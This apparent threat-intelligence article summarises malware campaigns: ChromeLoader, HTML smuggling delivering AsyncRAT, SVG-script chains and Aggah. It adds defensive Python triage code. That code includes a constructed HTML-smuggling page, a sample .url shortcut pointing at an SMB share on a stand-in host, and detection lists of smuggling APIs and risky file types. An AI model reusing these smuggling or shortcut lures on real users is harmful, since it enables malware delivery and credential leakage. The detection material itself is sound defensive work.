Threat actors are increasingly leveraging generative AI to build their attack chains. Recent campaigns show how far this has come: one used VBScript and JavaScript that bear the hallmarks of AI-generated code to deliver AsyncRAT, while others embedded malicious JavaScript within SVG images to start multi-stage infections.
ChromeLoader campaigns have become more targeted and polished, using malvertising and MSI installers to bypass security controls and infect endpoints. The pace of these changes illustrates how quickly attackers iterate, and why organizations need to adapt their security strategies to counter evolving threats.
ChromeLoader is a malicious browser extension delivered through fake software installers that are signed with valid code signing certificates, so they pass signature checks, and distributed via malvertising campaigns.
Once installed, ChromeLoader monitors and controls the victim's browsing session, redirecting search queries to attacker-controlled websites for ad fraud. It persists on the infected system through a Registry Run key and loads automatically with the browser, so a quick host check covers both the Run keys and the list of installed extensions.
An HTML smuggling campaign is the clearest sign of generative AI in malware development so far. The attackers used a password-protected HTML attachment to deliver a VBScript payload, which in turn deployed the AsyncRAT remote access trojan.
Unusually, the VBScript and JavaScript files were not obfuscated; instead they carried clear, descriptive comments of the kind generative AI tools produce, suggesting the code was written with such a tool. This underlines how accessible advanced attacks have become: AI assistance lets less skilled threat actors produce more sophisticated and effective malware.
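The HTML smuggling chain described above can be triaged statically before the attachment ever reaches a browser. The following Python is an added example, not code from the page or from HP: it flags the JavaScript APIs that reconstruct a file client-side, finds large base64 blobs, and carves them to identify the payload by magic bytes. The sample page, the API list and the 200-character threshold are assumptions made here.

```python
"""Static triage for HTML smuggling attachments.

Added example, not code from the page or from HP. The HTML below is constructed:
it embeds a base64 ZIP and rebuilds it client-side with atob/Blob/createObjectURL,
the standard smuggling pattern. A password-protected variant keeps the blob
encrypted until the victim types the password, so carving then fails but the
API indicators still fire.
"""
from __future__ import annotations

import base64
import io
import re
import zipfile

# JavaScript APIs that turn an inline string into a file on disk, plus prompt(),
# which is how a password-gated variant collects the key (assumption: heuristic list).
SMUGGLING_APIS = ("atob(", "Blob(", "createObjectURL", "msSaveOrOpenBlob",
                  "Uint8Array", ".download", "prompt(")
# A run of 200+ base64 characters, possibly broken across lines.
B64_RUN = re.compile(r"(?:[A-Za-z0-9+/]\s*){200,}={0,2}")
MAGIC = {b"PK\x03\x04": "zip", b"MZ": "pe", b"%PDF": "pdf", b"\x1f\x8b": "gzip"}


def smuggling_indicators(html: str) -> dict:
    """Count file-building API hits and large base64 blobs in an HTML attachment."""
    apis = [api for api in SMUGGLING_APIS if api in html]
    blobs = [re.sub(r"\s+", "", m.group(0)) for m in B64_RUN.finditer(html)]
    return {"apis": apis, "blob_count": len(blobs),
            "largest_blob": max((len(b) for b in blobs), default=0),
            "suspicious": bool(apis) and bool(blobs)}


def carve_payloads(html: str) -> list[dict]:
    """Decode every large base64 blob and identify it by magic bytes."""
    out = []
    for m in B64_RUN.finditer(html):
        try:
            data = base64.b64decode(re.sub(r"\s+", "", m.group(0)), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        kind = next((k for magic, k in MAGIC.items() if data.startswith(magic)), "unknown")
        entry = {"type": kind, "size": len(data)}
        if kind == "zip":
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                entry["members"] = zf.namelist()
        out.append(entry)
    return out


def build_sample_html() -> str:
    """Constructed smuggling page (not a real sample): base64 ZIP holding a VBS."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("document.vbs", "' constructed placeholder, not a real script\r\n" * 6)
    b64 = base64.b64encode(buf.getvalue()).decode()
    return f"""<html><body><script>
var payload = "{b64}";
var bytes = Uint8Array.from(atob(payload), c => c.charCodeAt(0));
var blob = new Blob([bytes], {{type: "application/zip"}});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob); a.download = "document.zip"; a.click();
</script></body></html>"""


if __name__ == "__main__":
    page = build_sample_html()
    print(smuggling_indicators(page))
    print(carve_payloads(page))
```

The blob regex tolerates line-wrapped base64 but not strings assembled from many short concatenated literals, and an encrypted (password-protected) blob will carve as "unknown"; in both cases the API indicators are the signal to act on, and the attachment should be detonated in a sandbox rather than trusted because carving came up empty.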
Another campaign exploited the scripting capabilities of SVG images. SVG is XML, and a browser that opens an SVG file directly executes any script it contains, so an "image" attachment is really active content. By embedding malicious JavaScript in SVG files, the attackers tricked users into downloading a ZIP archive containing a URL (Internet shortcut) file that pointed to a remote SMB share.
That share hosted a shortcut file which, when opened, downloaded a batch file. The batch file dropped further VBS, CMD, BAT and PowerShell scripts into the user's local folders, and these in turn installed several malware families, including Venom RAT, XWorm, Remcos and AsyncRAT, on the infected endpoint.
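The first two hops of the SVG chain above (script inside an SVG, then a ZIP carrying a .url that points at an SMB share) can be checked with a few lines of parsing. The Python below is an added example, not code from the page or from HP; the SVG, the ZIP and the host 203.0.113.10 (a TEST-NET-3 address) are constructed here so it runs offline, and the extension list is an assumption.

```python
"""Triage for the SVG -> ZIP -> .url -> SMB chain summarised above.

Added example, not code from the page or from HP. The SVG, the ZIP and the
host 203.0.113.10 (TEST-NET-3) are constructed here so it runs offline.
"""
from __future__ import annotations

import io
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import urlsplit

SVG_NS = "{http://www.w3.org/2000/svg}"
XLINK_NS = "{http://www.w3.org/1999/xlink}"
# Member types that have no business inside a download that claims to be an image.
SUSPICIOUS_EXT = (".url", ".lnk", ".vbs", ".js", ".cmd", ".bat", ".ps1", ".hta")


def svg_script_indicators(svg_bytes: bytes) -> list[str]:
    """Return the reasons an SVG should be treated as active content.

    Browsers execute <script>, on* event handlers and javascript: URIs when an
    SVG is opened directly, so each hit is a reason to block the attachment.
    """
    findings = []
    for el in ET.fromstring(svg_bytes).iter():
        tag = el.tag.replace(SVG_NS, "")
        if tag == "script":
            findings.append("script element")
        for attr, value in el.attrib.items():
            name = attr.replace(XLINK_NS, "xlink:")
            if name.lower().startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            if value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URI in {name} on <{tag}>")
    return findings


def parse_internet_shortcut(text: str) -> dict:
    """Parse a Windows .url (InternetShortcut INI) file and classify its target.

    Both URL= and IconFile= are checked: a UNC path (\\\\host\\share) or a
    file://host/ URL in either field makes the machine reach out over SMB.
    """
    fields, section = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    smb_hosts = []
    for key in ("url", "iconfile"):
        target = fields.get(key, "")
        if target.startswith("\\\\"):
            smb_hosts.append(target[2:].split("\\", 1)[0])
        elif target.lower().startswith("file://") and urlsplit(target).hostname:
            smb_hosts.append(urlsplit(target).hostname)
    return {"target": fields.get("url", ""), "remote_smb": bool(smb_hosts), "hosts": smb_hosts}


def triage_zip(zip_bytes: bytes) -> list[dict]:
    """List ZIP members, flag risky extensions, and parse any .url member."""
    results = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            low = info.filename.lower()
            entry = {"name": info.filename, "size": info.file_size,
                     "suspicious": low.endswith(SUSPICIOUS_EXT)}
            if low.endswith(".url"):
                entry["shortcut"] = parse_internet_shortcut(
                    zf.read(info).decode("utf-8", "replace"))
            results.append(entry)
    return results


# Constructed sample: an SVG whose onload handler triggers the download, and the
# ZIP it would fetch, holding a .url that points at a remote SMB share.
SAMPLE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="fetchZip()">
  <script>function fetchZip(){ /* builds a Blob and clicks a download link */ }</script>
  <rect width="10" height="10"/>
</svg>"""


def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.url",
                    "[InternetShortcut]\r\nURL=\\\\203.0.113.10\\share\\invoice.lnk\r\n")
    return buf.getvalue()


if __name__ == "__main__":
    print(svg_script_indicators(SAMPLE_SVG))
    for member in triage_zip(build_sample_zip()):
        print(member)
```

ElementTree rejects malformed XML, so a sample that deliberately breaks the parser should be treated as suspicious rather than clean. A .url whose target resolves to an external SMB host is worth blocking on its own: besides fetching the next stage, the outbound SMB connection leaks the user's NTLM credentials to the attacker's server.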
The Aggah malware campaign switched from weaponized Office documents to PDF documents that trick users into downloading a VBScript, which in turn downloads a PowerShell script.
The PowerShell script disables security features and injects Agent Tesla, an information stealer that exfiltrates the stolen data via Discord. Despite the change in file type, Aggah's TTPs remain largely the same, so detections built on the VBScript and PowerShell stages still apply.
According to HP, archives reclaimed the top spot as the most popular malware delivery method, surpassing executables and scripts. Threat actors exploited a variety of archive formats, with ZIP files being particularly prevalent.
Email remained the primary vector for delivering malware, while web browser downloads and other vectors experienced minor declines. Despite email gateway scanners, a significant portion of malicious emails managed to bypass detection.